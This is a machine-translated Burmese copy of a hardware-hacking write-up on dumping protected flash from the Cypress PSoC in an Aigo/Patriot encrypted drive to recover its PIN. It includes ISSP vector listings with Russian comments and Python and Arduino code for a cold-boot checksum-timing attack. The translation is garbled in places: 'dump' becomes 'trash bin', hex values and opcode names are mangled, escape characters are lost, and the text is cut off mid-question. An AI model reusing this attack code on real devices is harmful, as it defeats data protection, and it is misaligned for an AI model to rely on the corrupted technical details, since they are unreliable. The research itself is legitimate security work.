ဤသည်မှာ ပြင်ပကိုယ်တိုင်ကုဒ်ဝှက်ခြင်းဒရိုက်များကို ဟက်ကာအကြောင်း ဒုတိယနှင့် နောက်ဆုံးအပိုင်းဖြစ်သည်။ လုပ်ဖော်ကိုင်ဖက်တစ်ဦးသည် မကြာသေးမီက ကျွန်ုပ်အား Patriot (Aigo) SK8671 hard drive ကို ယူဆောင်လာခဲ့ပြီး ၎င်းကို နောက်ပြန်လှည့်ရန် ဆုံးဖြတ်ခဲ့ပြီး ယခုအခါ ၎င်းမှထွက်လာသည့်အရာများကို မျှဝေလိုက်ခြင်းဖြစ်သည်ကို ကျွန်ုပ်အား သတိပေးပါရစေ။ ထပ်မဖတ်ခင် သေချာဖတ်ပါ။ ပထမပိုင်း ဆောင်းပါး။

4. ကျွန်ုပ်တို့သည် အတွင်းပိုင်း PSoC flash drive မှ အမှိုက်ပုံးတစ်ခုကို စတင်လိုက်ပါသည်။
5. ISSP ပရိုတိုကော
– ၅.၁။ ISSP ဆိုတာဘာလဲ
– ၅.၂။ Demystifying Vectors
– ၅.၃။ PSoC နှင့် ဆက်သွယ်မှု
– ၅.၄။ on-chip မှတ်ပုံတင်မှုများကို ဖော်ထုတ်ခြင်း။
– ၅.၅။ လုံခြုံရေးအပိုင်းများ
6. ပထမ (မအောင်မြင်) တိုက်ခိုက်မှု- ROMX
7. ဒုတိယတိုက်ခိုက်မှု- Cold Boot ခြေရာခံခြင်း။
– ၇.၁။ အကောင်အထည်ဖော်ခြင်း။
– ၇.၂။ ရလဒ်ကိုဖတ်ခြင်း။
– ၇.၃။ Flash binary ပြန်လည်တည်ဆောက်မှု
– ၇.၄။ ပင်နံပါတ်ကုဒ် သိုလှောင်မှုလိပ်စာကို ရှာဖွေခြင်း။
– ၇.၅။ အမှိုက်ပုံကြီး အမှတ် ၁၂၆ ကို ယူခြင်း။
– ၇.၆။ ပင်နံပါတ်ကုဒ် ပြန်လည်ရယူခြင်း။
8. နောက်တစ်ခုက ဘာလဲ။
၈။ နိဂုံး

4. ကျွန်ုပ်တို့သည် အတွင်းပိုင်း PSoC flash drive မှ အမှိုက်ပုံးတစ်ခုကို စတင်လိုက်ပါသည်။

ထို့ကြောင့်၊ အားလုံးသည် ([ပထမပိုင်း]()) တွင် PIN ကုဒ်ကို PSoC ၏ flash အတိမ်အနက်တွင် သိမ်းဆည်းထားကြောင်း ([ပထမပိုင်း]()) တွင် ညွှန်ပြသည်။ ထို့ကြောင့် ဤအလင်းအတိမ်အနက်ကို ကျွန်ုပ်တို့ဖတ်ရန် လိုအပ်ပါသည်။ လိုအပ်သော အလုပ်၏ ရှေ့၊

• microcontroller နှင့် "ဆက်သွယ်ရေး" ကိုထိန်းချုပ်ပါ။
• ဤ “ဆက်သွယ်ရေး” ကို ပြင်ပမှဖတ်ရှုခြင်းမှ ကာကွယ်ခြင်းရှိမရှိ စစ်ဆေးရန် နည်းလမ်းရှာပါ။
• အကာအကွယ်ကို ကျော်လွှားရန် နည်းလမ်းရှာပါ။

မှန်ကန်သော PIN ကုဒ်ကို ရှာဖွေရန် အဓိပ္ပာယ်ရှိသော နေရာနှစ်ခုရှိသည်။

• အတွင်းပိုင်း flash memory;
• SRAM၊ အသုံးပြုသူထည့်သွင်းထားသော pin ကုဒ်နှင့် နှိုင်းယှဉ်ရန် ပင်ကုဒ်ကို သိမ်းဆည်းထားနိုင်သည်။

ရှေ့ကိုမျှော်ကြည့်ရင်း၊ ISSP ပရိုတိုကော၏ စာရွက်စာတမ်းမရှိသောစွမ်းရည်များကို ပြောင်းပြန်လှန်ပြီးနောက် ၎င်း၏လုံခြုံရေးစနစ်အား “အေးခဲဘွတ်ခြေရာကောက်ခြင်း” ဟုခေါ်သော ဟာ့ဒ်ဝဲတိုက်ခိုက်မှုကို ကျော်ဖြတ်ကာ အတွင်းပိုင်း PSoC flash drive ကို အမှိုက်သိမ်းနိုင်ဆဲဖြစ်ကြောင်း သတိပြုမိပါမည်။ ၎င်းသည် ကျွန်ုပ်အား အမှန်တကယ်ပင် PIN ကုဒ်ကို တိုက်ရိုက်လွှင့်ပစ်နိုင်စေပါသည်။

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

နောက်ဆုံး ပရိုဂရမ်ကုဒ်-

• HSSP အတွက် Arduino ကုဒ်;
• Python driver နှင့် ISSP disassembler.

5. ISSP ပရိုတိုကော

၅.၁။ ISSP ဆိုတာဘာလဲ

မိုက်ခရိုကွန်ထရိုလာနှင့် "ဆက်သွယ်ခြင်း" သည် ကွဲပြားသောအရာများကို အဓိပ္ပာယ်ဖွင့်ဆိုနိုင်သည်- "ရောင်းချသူမှ ရောင်းချသူ" မှ အမှတ်စဉ်ပရိုတိုကောကို အသုံးပြု၍ အပြန်အလှန်ဆက်သွယ်ခြင်းအထိ (ဥပမာ၊ Microchip's PIC အတွက် ICSP)။

Cypress တွင် တစ်စိတ်တစ်ပိုင်း ဖော်ပြထားသည့် ISSP (in-system serial programming protocol) ဟုခေါ်သော ယင်းအတွက် ၎င်း၏ကိုယ်ပိုင် protocol ရှိသည်။ နည်းပညာဆိုင်ရာသတ်မှတ်ချက်. မူပိုင်ခွင့် US7185162 အချက်အလက်အချို့ကိုလည်းပေးသည်။ HSSP ဟုခေါ်သော OpenSource နှင့် ညီမျှသည် (ကျွန်ုပ်တို့ ၎င်းကို နောက်အနည်းငယ်ကြာမှ သုံးပါမည်)။ ISSP သည် အောက်ပါအတိုင်း လုပ်ဆောင်သည်။

• PSoC ကို ပြန်လည်စတင်ပါ။
• ဤ PSoC ၏ အမှတ်စဉ်ဒေတာ pin သို့ မှော်နံပါတ်ကို ထုတ်ပါ။ ပြင်ပ ပရိုဂရမ်းမင်းမုဒ်သို့ ဝင်ရောက်ရန်၊
• "vectors" ဟုခေါ်သော ရှည်လျားသော bit string များဖြစ်သည့် command များကို ပေးပို့ပါ။

ISSP စာရွက်စာတမ်းသည် ဤ vector များကို command အနည်းငယ်မျှသာအတွက် သတ်မှတ်သည်-

• စတင်ရန်- ၁
• စတင်ရန်- ၁
• Initialize-3 (3V နှင့် 5V ရွေးချယ်စရာများ)
• ID-SETUP
• ဖတ်-အိုင်ဒီ-စကားလုံး
• SET-BLOCK-NUM: 10011111010dddddddd111, dddddddd=block# ရှိရာ၊
• အစုလိုက် ဖျက်ခြင်း
• ပရိုဂရမ်-ပိတ်ဆို့
• အတည်ပြုသတ်မှတ်ခြင်း။
• READ-BYTE- 10110aaaaaaZDDDDDDDDZ1 နေရာတွင် DDDDDDDD = data out၊ aaaaaa = လိပ်စာ (6 bits)
• WRITE-BYTE- 10010aaaaaaaddddddd111၊ where dddddddd = ဒေတာ၊ aaaaaa = လိပ်စာ (6 bits)
• Secure
• စစ်ဆေးချက်-သတ်မှတ်မှု
• READ-CheckSUM- 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1၊ DDDDDDDDDDDDDDDD = ဒေတာထွက်သည့်နေရာ- စက်စစ်ဆေးချက်
• ပိတ်ဆို့ခြင်းကို ဖျက်ပါ။

ဥပမာ၊ Initialize-2 အတွက် vector

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

vector များအားလုံးသည် တူညီသောအရှည်ရှိသည်- 22 bits။ HSSP စာရွက်စာတမ်းတွင် ISSP တွင် နောက်ထပ်အချက်အလက်အချို့ပါရှိသည်- "ISSP vector သည် ညွှန်ကြားချက်အစုအဝေးကို ကိုယ်စားပြုသည့် နည်းနည်းစီစီထက် မပိုပါ။"

၅.၂။ Demystifying Vectors

ဒီမှာဘာတွေဖြစ်နေလဲ အဖြေရှာကြည့်ရအောင်။ အစပိုင်းတွင်၊ ဤတူညီသော vector များသည် M8C လမ်းညွှန်ချက်များ၏ အကြမ်းထည်ဗားရှင်းများဖြစ်သည်ဟု ကျွန်တော်ယူဆခဲ့သော်လည်း၊ ဤယူဆချက်ကို စစ်ဆေးပြီးနောက်၊ လုပ်ဆောင်ချက်များ၏ opcodes များသည် မကိုက်ညီကြောင်း တွေ့ရှိခဲ့သည်။

ပြီးရင် အပေါ်က vector ကို google လုပ်ပြီး တွေ့တယ်။ ဒီ စာရေးဆရာသည် အသေးစိတ်မဖော်ပြထားသော်လည်း အသုံးဝင်သော အကြံဥာဏ်အချို့ကို ပေးသည့် လေ့လာမှုတစ်ခုတွင် “ညွှန်ကြားချက်တစ်ခုစီသည် mnemonics လေးခုအနက်မှ တစ်ခုနှင့် ကိုက်ညီသော bits သုံးလုံးဖြင့် စတင်သည် (RAM မှ RAM သို့ ရေးရန်၊ read register၊ write register)။ ထို့နောက်တွင် လိပ်စာဘစ် 8 ခုရှိပြီး၊ ဒေတာ 8 ခု (ဖတ်ရန် သို့မဟုတ် စာရေး) နှင့် နောက်ဆုံးတွင် ရပ်တန့်ဘစ်သုံးခုရှိသည်။

ထို့နောက် Supervisory ROM (SROM) ကဏ္ဍမှ အလွန်အသုံးဝင်သော အချက်အလက်အချို့ကို ကျွန်ုပ်စုဆောင်းနိုင်ခဲ့သည်။ နည်းပညာဆိုင်ရာလက်စွဲစာအုပ်. SROM သည် အသုံးပြုသူနေရာလွတ်တွင် လုပ်ဆောင်နေသော ပရိုဂရမ်ကုဒ်အတွက် အသုံးဝင်သောလုပ်ဆောင်ချက်များ (Syscall နှင့် အလားတူ) ကို ပံ့ပိုးပေးသည့် PSoC ရှိ hard-coded ROM တစ်ခုဖြစ်သည်။

• 00 နာရီ:SWBoot ပြန်လည်သတ်မှတ်ခြင်း။
• 01 နာရီ- ReadBlock
• 02 နာရီ- WriteBlock
• 03 နာရီ- EraseBlock
• 06 နာရီ- TableRead
• 07 နာရီ- CheckSum
• 08 နာရီ- Calibrate0
• 09 နာရီ- Calibrate1

Vector အမည်များကို SROM လုပ်ဆောင်ချက်များနှင့် နှိုင်းယှဉ်ခြင်းဖြင့်၊ ကျွန်ုပ်တို့သည် ဤပရိုတိုကောမှ ပံ့ပိုးပေးထားသည့် လုပ်ဆောင်ချက်အမျိုးမျိုးကို မျှော်မှန်းထားသည့် SROM ကန့်သတ်ဘောင်များနှင့် မြေပုံဆွဲနိုင်ပါသည်။ ယင်းကြောင့်၊ ကျွန်ုပ်တို့သည် ISSP vector များ၏ ပထမသုံးဘစ်ကို ကုဒ်လုပ်နိုင်သည်-

• 100 => “ဝ”
• 101 => “rdmem”
• 110 => “အမှား”
• 111 => “rdreg”

သို့သော်၊ on-chip လုပ်ငန်းစဉ်များအကြောင်း အပြည့်အစုံနားလည်မှုကို PSoC နှင့် တိုက်ရိုက်ဆက်သွယ်မှုမှသာလျှင် ရရှိနိုင်ပါသည်။

၅.၃။ PSoC နှင့် ဆက်သွယ်မှု

Dirk Petrautsky ကတည်းက ရှိပြီးသားပါ။ ပို့ထားသည်။ Arduino ရှိ Cypress ၏ HSSP ကုဒ်၊ ကျွန်ုပ်သည် ကီးဘုတ်ဘုတ်၏ ISSP ချိတ်ဆက်ကိရိယာသို့ ချိတ်ဆက်ရန် Arduino Uno ကို အသုံးပြုခဲ့သည်။

ကျွန်ုပ်၏သုတေသနသင်တန်းတွင်၊ ကျွန်ုပ်သည် Dirk ၏ကုဒ်ကို အနည်းငယ်ပြောင်းထားကြောင်း သတိပြုပါ။ ကျွန်ုပ်၏ ပြုပြင်မွမ်းမံမှုကို GitHub တွင် ရှာတွေ့နိုင်သည်- ဒီမှာ နှင့် Arduino နှင့် ဆက်သွယ်ရန်အတွက် သက်ဆိုင်ရာ Python script ကို ကျွန်ုပ်၏ သိုလှောင်ခန်းတွင်၊ cypress_psoc_tools.

ထို့ကြောင့် Arduino ကိုအသုံးပြု၍ "ဆက်သွယ်ရေး" အတွက် "တရားဝင်" vector များကိုသာအသုံးပြုခဲ့သည်။ VERIFY အမိန့်ကိုသုံးပြီး internal ROM ကိုဖတ်ဖို့ကြိုးစားခဲ့တယ်။ မျှော်လင့်ထားသလိုပဲ ကျွန်တော် ဒါကို မလုပ်နိုင်ခဲ့ပါဘူး။ flash drive ထဲမှာ read protection bits တွေ activated ဖြစ်နေတာကြောင့် ဖြစ်နိုင်ပါတယ်။

ထို့နောက် ကျွန်ုပ်သည် ကျွန်ုပ်၏ကိုယ်ပိုင် ရိုးရှင်းသော vector အချို့ကို ရေးသားခြင်းနှင့် ဖတ်ခြင်း မှတ်ဉာဏ်/မှတ်ပုံတင်ခြင်းအတွက် ဖန်တီးခဲ့သည်။ flash drive ကိုကာကွယ်ထားသော်လည်းကျွန်ုပ်တို့သည် SROM တစ်ခုလုံးကိုဖတ်နိုင်သည်ကိုသတိပြုပါ။

၅.၄။ on-chip မှတ်ပုံတင်မှုများကို ဖော်ထုတ်ခြင်း။

" disassembled" vectors များကိုကြည့်ရှုပြီးနောက်၊ ကာကွယ်မှုကိုကျော်ဖြတ်၍ တိုက်ရိုက်လုပ်ဆောင်သည့် M0C opcodes ကိုသတ်မှတ်ရန် စက်ပစ္စည်းသည် စာရွက်စာတမ်းမရှိသောမှတ်ပုံတင်များ (8xF0-8xFA) ကိုအသုံးပြုကြောင်းတွေ့ရှိခဲ့သည်။ ၎င်းသည် "ADD", "MOV A, X", "PUSH" သို့မဟုတ် "JMP" ကဲ့သို့သော opcode အမျိုးမျိုးကို ကျွန်ုပ်အား လုပ်ဆောင်နိုင်စေခဲ့သည်။ ၎င်းတို့ကိုကျေးဇူးတင်ပါသည် (မှတ်ပုံတင်ခြင်းတွင်သူတို့၏ဘေးထွက်ဆိုးကျိုးများကိုကြည့်ခြင်းအားဖြင့်) ကျွန်ုပ်သည် မည်သည့်စာရွက်စာတမ်းမရှိသောမှတ်ပုံတင်များသည် အမှန်တကယ်ပုံမှန်မှတ်ပုံတင်ခြင်းဖြစ်သည် (A၊ X၊ SP နှင့် PC) ကိုဆုံးဖြတ်နိုင်ခဲ့သည်။

ရလဒ်အနေဖြင့် HSSP_disas.rb ကိရိယာမှထုတ်ပေးသော "ဖြုတ်တပ်ထားသော" ကုဒ်သည် ဤကဲ့သို့ပုံရသည် (ရှင်းလင်းမှုအတွက် မှတ်ချက်များကို ကျွန်ုပ်ထည့်သွင်းထားသည်)။

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00      # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A     # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03     # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00     # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30        # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06       # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # Недокумментированная операция: выполнить внешний опкод

၅.၅။ လုံခြုံရေးအပိုင်းများ

ဤအဆင့်တွင် ကျွန်ုပ်သည် PSoC နှင့် ဆက်သွယ်နိုင်နေပြီဖြစ်သော်လည်း flash drive ၏ လုံခြုံရေးအပိုင်းများနှင့် ပတ်သက်၍ ယုံကြည်စိတ်ချရသော အချက်အလက် မရှိသေးပါ။ Cypress သည် အကာအကွယ်ကို အသက်သွင်းထားခြင်းရှိမရှိ စစ်ဆေးရန် စက်ပစ္စည်းကို အသုံးပြုသူများအား မည်သည့်နည်းလမ်းဖြင့် ပံ့ပိုးမပေးသည့်အတွက်ကြောင့် ကျွန်ုပ် အလွန်အံ့သြမိပါသည်။ Dirk က သူရဲ့မွမ်းမံမှုကို ထုတ်ပြန်ပြီးနောက် Cypress က ပေးတဲ့ HSSP ကုဒ်ကို အပ်ဒိတ်လုပ်ထားတယ်ဆိုတာကို နောက်ဆုံးနားလည်ဖို့ Google ထဲကို နက်နက်နဲနဲ တူးဖော်မိပါတယ်။ ဆိုတော့! ဤ vector အသစ်ပေါ်လာသည်-

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

ဤ vector ကို အသုံးပြုခြင်း (psoc.py တွင် read_security_data ကို ကြည့်ပါ)၊ ကျွန်ုပ်တို့သည် ကာကွယ်ထားသော ဘလောက်တစ်ခုလျှင် နှစ်ဘစ်ပါရှိသော SRAM တွင် လုံခြုံရေးဘစ်များအားလုံးကို 0x80 ဖြင့် ရရှိပါသည်။

ရလဒ်သည် စိတ်ပျက်စရာကောင်းသည်- "ပြင်ပစာဖတ်ခြင်းနှင့် စာရေးခြင်းကို ပိတ်ရန်" မုဒ်တွင် အရာအားလုံးကို ကာကွယ်ထားသည်။ ထို့ကြောင့်၊ ကျွန်ုပ်တို့သည် flash drive မှဘာကိုမျှမဖတ်နိုင်ရုံသာမကဘာမှမရေးနိုင် (ဥပမာ ROM dumper ကိုအဲဒီမှာထည့်သွင်းရန်) ။ ကာကွယ်မှုကိုပိတ်ရန်တစ်ခုတည်းသောနည်းလမ်းမှာ chip တစ်ခုလုံးကိုလုံးဝဖျက်ပစ်ရန်ဖြစ်သည်။ 🙁

6. ပထမ (မအောင်မြင်) တိုက်ခိုက်မှု- ROMX

သို့သော်၊ ကျွန်ုပ်တို့သည် အောက်ပါလှည့်ကွက်များကို စမ်းကြည့်နိုင်သည်- ကျွန်ုပ်တို့တွင် မတရားသော opcode များကို လုပ်ဆောင်နိုင်စွမ်းရှိသောကြောင့် flash memory ကိုဖတ်ရန်အသုံးပြုသည့် ROMX ကို အဘယ်ကြောင့် execute မလုပ်ရသနည်း။ ဒီနည်းလမ်းက အောင်မြင်ဖို့ အခွင့်အလမ်းကောင်း ရှိတယ်။ အဘယ်ကြောင့်ဆိုသော် SROM မှ ဒေတာများကို ဖတ်ပြသော ReadBlock လုပ်ဆောင်ချက်သည် ၎င်းအား ISSP မှ ခေါ်ခြင်းရှိမရှိ စစ်ဆေးပေးသောကြောင့် ဖြစ်သည်။ သို့သော်လည်း ROMX opcode တွင် ထိုသို့သောစစ်ဆေးမှုမျိုး ရှိမည်မဟုတ်ပေ။ ထို့ကြောင့် ဤတွင် Python ကုဒ် (Arduino ကုဒ်သို့ အထောက်အကူ အတန်းအနည်းငယ်ကို ပေါင်းထည့်ပြီးနောက်)။

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = 0
    write_reg(0xF3, i&0xFF)     # X = 0
    exec_opcodes("x28x30x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print ROM byte

ကံမကောင်းစွာပဲ ဒီကုဒ်က အလုပ်မလုပ်ပါဘူး။ 🙁 သို့တည်းမဟုတ် ၎င်းသည် အလုပ်လုပ်သော်လည်း output တွင် ကျွန်ုပ်တို့၏ကိုယ်ပိုင် opcodes (0x28 0x30 0x40) ကို ရရှိပါသည်။ စက်၏ ဆက်စပ်လုပ်ဆောင်နိုင်စွမ်းသည် စာဖတ်ခြင်းအား အကာအကွယ်ပေးသည့် အစိတ်အပိုင်းတစ်ခုဟု မထင်ပါ။ ၎င်းသည် အင်ဂျင်နီယာလှည့်ကွက်တစ်ခုနှင့် ပိုတူသည်- ပြင်ပ opcodes များကို လုပ်ဆောင်သောအခါ၊ ROM ဘတ်စ်ကားကို ယာယီကြားခံတစ်ခုသို့ ပြန်ညွှန်းသည်။

7. ဒုတိယတိုက်ခိုက်မှု- Cold Boot ခြေရာခံခြင်း။

ROMX လှည့်ကွက်က အလုပ်မဖြစ်တဲ့အတွက်၊ ထုတ်ဝေမှုမှာ ဖော်ပြထားတဲ့ ဒီလှည့်ကွက်ရဲ့ နောက်ထပ်ပုံစံတစ်မျိုးကို စတင်စဉ်းစားခဲ့တယ်။ "Microcontroller ၏ Firmware Protection တွင်အလင်းအလွန်အကျွံထုတ်ခြင်း".

၇.၁။ အကောင်အထည်ဖော်ခြင်း။

ISSP စာရွက်စာတမ်းသည် CHECKSUM-SETUP အတွက် အောက်ပါ vector ကို ပံ့ပိုးပေးသည်-

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

၎င်းသည် စာရွက်စာတမ်းတွင်ဖော်ပြထားသည့်အတိုင်း (စာစောင်းမိုင်း) ကို အခြေခံအားဖြင့် SROM လုပ်ဆောင်ချက်ကို 0x07 ဟုခေါ်သည်။

ဤလုပ်ဆောင်ချက်သည် checksum စစ်ဆေးခြင်း ဖြစ်သည်။ ၎င်းသည် flash bank တစ်ခုရှိ အသုံးပြုသူသတ်မှတ်ထားသော ဘလောက်အရေအတွက်၏ 16-bit checksum ကို သုညမှစတင်ကာ တွက်ချက်သည်။ BLOCKID ပါရာမီတာကို checksum တွက်ချက်ရာတွင် အသုံးပြုမည့် blocks အရေအတွက်ကို ကျော်ဖြတ်ရန်အတွက် အသုံးပြုပါသည်။ "1" တန်ဖိုးသည် block zero အတွက် checksum ကိုသာတွက်ချက်ပါမည်။ ကြရင်တော့ "0" သည် flash bank ၏ 256 တုံးအားလုံး၏ စုစုပေါင်း checksum ကို တွက်ချက်ရမည်ဖြစ်ပါသည်။ 16-bit checksum ကို KEY1 နှင့် KEY2 မှတဆင့် ပြန်ပေးသည်။ KEY1 ကန့်သတ်ဘောင်သည် checksum ၏ အနိမ့်ပိုင်း 8 bits ကို သိမ်းဆည်းထားပြီး KEY2 ကန့်သတ်ဘောင်သည် မြင့်မားသော အမှာစာ 8 bits ကို သိမ်းဆည်းထားသည်။ flash bank များစွာရှိသော စက်ပစ္စည်းများအတွက်၊ တစ်ခုချင်းစီအတွက် checksum လုပ်ဆောင်ချက်ကို သီးခြားစီခေါ်သည်။ ၎င်းတွင်အလုပ်လုပ်မည့်ဘဏ်နံပါတ်ကို FLS_PR1 မှတ်ပုံတင်ခြင်းဖြင့်သတ်မှတ်သည် (၎င်းတွင်ပစ်မှတ် flash bank နှင့်သက်ဆိုင်သော bit ကိုသတ်မှတ်ခြင်းဖြင့်) ။

၎င်းသည် ရိုးရှင်းသော checksum တစ်ခုဖြစ်ကြောင်း သတိပြုပါ- bytes များကို အခြားတစ်ခုပြီးတစ်ခု ရိုးရှင်းစွာထည့်ထားသည်။ စိတ်ကူးယဉ် CRC ထူးထူးခြားခြားမရှိပါ။ ထို့အပြင် M8C core တွင် မှတ်ပုံတင်ထားသော အစုအဝေးတစ်ခုရှိသည်ကို သိရှိထားသောကြောင့် checksum ကို တွက်ချက်သည့်အခါ၊ အလယ်အလတ်တန်ဖိုးများကို နောက်ဆုံးတွင် output သို့သွားမည့် KEY1 (0xF8) / KEY2 (တူညီသော variables များတွင် မှတ်တမ်းတင်ထားလိမ့်မည်၊ 0xF9)။

သီအိုရီအရ ကျွန်ုပ်၏ တိုက်ခိုက်မှုသည် ဤကဲ့သို့ ဖြစ်ပုံရသည်။

1. ကျွန်ုပ်တို့သည် ISSP မှတဆင့်ချိတ်ဆက်သည်။
2. ကျွန်ုပ်တို့သည် CHECKSUM-SETUP vector ကို အသုံးပြု၍ checksum တွက်ချက်မှုကို စတင်ပါသည်။
3. သတ်မှတ်ထားသောအချိန်တစ်ခုပြီးနောက် ကျွန်ုပ်တို့သည် ပရိုဆက်ဆာအား ပြန်လည်စတင်သည်။
4. လက်ရှိ checksum C ကိုရရန် RAM ကိုဖတ်သည်။
5. အဆင့် 3 နှင့် 4 ကိုပြန်လုပ်ပါ၊ T ကိုအကြိမ်တိုင်းအနည်းငယ်တိုးပေးပါ။
6. ကျွန်ုပ်တို့သည် ယခင် checksum C ကို လက်ရှိတစ်ခုမှ နုတ်ခြင်းဖြင့် flash drive မှဒေတာများကို ပြန်လည်ရယူသည်။

သို့သော်၊ ပြန်ဖွင့်ပြီးနောက် ကျွန်ုပ်တို့ပေးပို့ရမည့် Initialize-1 vector သည် KEY1 နှင့် KEY2 ကို ထပ်ရေးထားသည်။

1100101000000000000000  # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Calibrate1 (SROM လုပ်ဆောင်ချက် 9) ကိုခေါ်ဆိုခြင်းဖြင့် ကျွန်ုပ်တို့၏ အဖိုးတန် checksum ကို ဤကုဒ်ကို ထပ်ရေးပေးသည်... ဖြစ်နိုင်ပြီး ကျွန်ုပ်တို့သည် ပရိုဂရမ်းမင်းမုဒ်သို့ ဝင်ရောက်ရန်အတွက် မှော်နံပါတ် (အထက်ကုဒ်၏အစမှ) ကို ပေးပို့နိုင်ပြီး၊ ထို့နောက် SRAM ကို ဖတ်နိုင်မည်ဖြစ်သည်။ ဟုတ်တယ်၊ အဲဒါ အလုပ်လုပ်တယ်။ ဤတိုက်ခိုက်မှုကိုအကောင်အထည်ဖော်သည့် Arduino ကုဒ်သည် အလွန်ရိုးရှင်းပါသည်။

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

1. checkum_delay ကိုဖတ်ပါ။
2. checksum တွက်ချက်မှု (send_checksum_v) ကို လုပ်ဆောင်ပါ။
3. သတ်မှတ်ထားသောအချိန်ကာလတစ်ခုစောင့်ဆိုင်း; အောက်ပါအခက်အခဲများကို ထည့်သွင်းစဉ်းစားပါ။
   • ဘာဖြစ်လာမလဲဆိုတာကို မတွေ့မချင်း အချိန်တွေ အများကြီးကုန်ခဲ့တယ်။ နှောင့်နှေးမိုက်ခရိုစက္ကန့်များ 16383 μsထက်မပိုသောနှောင့်နှေးမှုများဖြင့်သာမှန်ကန်စွာအလုပ်လုပ်သည်။
   • ထို့နောက် နှောင့်နှေးသောမိုက်ခရိုစက္ကန့်များကို 0 ထည့်သွင်းမှုတစ်ခုအဖြစ် ဖြတ်သွားပါက၊ လုံးလုံးမှားယွင်းစွာ အလုပ်လုပ်သည်ကို ကျွန်ုပ်ရှာဖွေတွေ့ရှိသည်အထိ တူညီသောအချိန်ပမာဏကို ထပ်မံသတ်ပစ်လိုက်ပါသည်။
4. PSoC ကို ပရိုဂရမ်းမင်းမုဒ်သို့ ပြန်လည်စတင်ပါ (ကျွန်ုပ်တို့သည် ကနဦးထည့်သွင်းခြင်း vector များကို မပို့ဘဲ မှော်နံပါတ်ကို ပို့ရုံသာ)။

Python တွင် နောက်ဆုံးကုဒ်

for delay in range(0, 150000):  # задержка в микросекундах
    for i in range(0, 10):      # количество считывания для каждойиз задержек
        try:
            reset_psoc(quiet=True)  # перезагрузка и вход в режим программирования
            send_vectors()      # отправка инициализирующих векторов
            ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
            res = ser.read(1)       # считать arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
            continue
        print "%05d %02X %02X %02X" % (delay,      # считать RAM-байты
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

အတိုချုပ်အားဖြင့်၊ ဤကုဒ်သည် အဘယ်အရာလုပ်ဆောင်သနည်း။

